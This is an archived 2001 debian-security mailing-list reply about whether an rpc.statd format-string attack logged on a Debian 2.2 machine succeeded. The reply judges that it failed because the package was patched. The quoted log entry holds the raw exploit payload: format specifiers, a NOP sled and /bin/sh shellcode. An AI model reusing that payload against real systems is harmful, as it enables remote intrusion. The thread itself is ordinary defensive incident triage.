Re: was I cracked? (rpc.statd, new version)

To: debian-security@lists.debian.org
Subject: Re: was I cracked? (rpc.statd, new version)
From: Ethan Benson <erbenson@alaska.net>
Date: Wed, 11 Jul 2001 03:07:52 -0800
Message-id: <[🔎] 20010711030752.V26109@plato.local.lan>
Mail-followup-to: debian-security@lists.debian.org
In-reply-to: <[🔎] 01071111420302.00984@io>; from lukas.eppler@tempobrain.com on Wed, Jul 11, 2001 at 11:42:03AM +0100
References: <[🔎] 01071111420302.00984@io>

On Wed, Jul 11, 2001 at 11:42:03AM +0100, Lukas Eppler wrote:
> I have the following entries in /var/log/messages:
> 
> Jul  9 01:21:03 blue -- MARK --
> Jul  9 01:21:11 blue
> Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for 
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> Jul  9 01:21:11 blue 
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>\200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
> Jul  9 01:41:03 blue -- MARK --
> 
> I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long known 
> exploit fixed. I can't find modified binaries or any strange behaviour... was 
> this a defeated attack? The second line says /bin/sh somewhere which makes me 
> a bit concerned... Was I cracked?

the exploit failed, your nfs-common is up to date.

you can also tell because you can see the %8x%8x%8x in the log entry.
if it suceeds i understand that statd usually crashes before logging
anything anyway.

if your not using nfs you should remove the nfs-common package
anyway. 

-- 
Ethan Benson
http://www.alaska.net/~erbenson/

Attachment: pgpBL442y7lkK.pgp
Description: PGP signature

Reply to:

References:
- was I cracked? (rpc.statd, new version)
  - From: Lukas Eppler <lukas.eppler@tempobrain.com>

Prev by Date: was I cracked? (rpc.statd, new version)
Next by Date: RE: was I cracked? (rpc.statd, new version)
Previous by thread: was I cracked? (rpc.statd, new version)
Next by thread: RE: was I cracked? (rpc.statd, new version)
Index(es):
- Date
- Thread